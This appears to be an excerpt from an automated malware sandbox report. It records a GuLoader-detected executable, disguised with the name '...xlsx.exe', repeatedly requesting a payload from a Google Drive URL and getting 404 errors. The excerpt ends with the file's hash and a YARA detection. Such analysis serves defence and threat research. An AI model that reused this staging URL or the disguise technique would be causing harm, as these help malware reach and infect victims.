2024-12-16 17:07:07 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:08 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:08 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-ocU69I1BoV-fHlxQEvM3Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50023	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:10 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:11 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7aweZMacvmUf5gu6P_92Y143zJ-IcQZHTqpX_CLjH8f2Fe9dwf2xiPzQXE8Z902rRR Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:11 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-aq1AFrrxZ3LER01lHV6nWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:07:11 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 44 50 4f 48 45 39 59 46 51 6b 72 33 50 6d 6a 76 75 4b 70 33 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gDPOHE9YFQkr3PmjvuKp3Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50024	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:24 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:25 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:24 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-hnj9gX41-FltgY1jyXjX7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50025	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:27 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:28 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7UPMuB80rDbALWgk-Q7HuTIc42Nb5-mH2sXTEMr0Li_jKeAWNBWVH4BMkUbzxkHQRO Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:27 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-PMfDxcEX284aRXl0mEZaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:07:28 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 59 78 72 33 5a 69 70 63 55 35 72 79 72 52 49 58 7a 6a 72 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UYxr3ZipcU5ryrRIXzjrNg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50027	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:40 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:41 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:40 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-_2JLqzX6LTmsM4z9gM4WSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50028	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:42 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:43 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7lhzDMhaIkxEICzsWwrnilFgThikntNQtqZZmlRb6jEUxRL1uwozKZj3VYDFEEAJuP Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:43 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-IXILVF3bU-z09tFmVcjZ_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:07:43 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 35 58 5f 36 31 4c 37 6f 46 46 73 5f 30 35 50 74 65 64 45 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T5X_61L7oFFs_05PtedEBg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50029	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:55 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:56 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:56 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-CGl8gSLfuLIrIWbC6_OtFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50030	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:07:58 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:07:59 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7vwFbp_BZu8CrE68JE2Hu6OguQprRj7PgtTdeP7oIriTuX45D6dTJVK-ex2g9L8-GG Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:07:59 GMT Content-Security-Policy: script-src 'nonce-OmsC__QuN2BMpl_AVgvkQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:07:59 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 36 71 70 53 4b 36 36 63 4c 67 58 70 74 37 61 43 6f 66 6f 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="46qpSK66cLgXpt7aCofo2w">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	12:04:51
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
Imagebase:	0x400000
File size:	530'598 bytes
MD5 hash:	321A9608E5BF03BF63F4574D0DF1A380
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
